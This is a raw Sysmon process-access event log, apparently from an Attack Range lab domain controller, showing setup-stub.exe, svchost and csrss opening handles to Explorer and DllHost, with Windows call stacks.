4b(wow64) 10341000x800000000000000016464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.630{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.630{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\S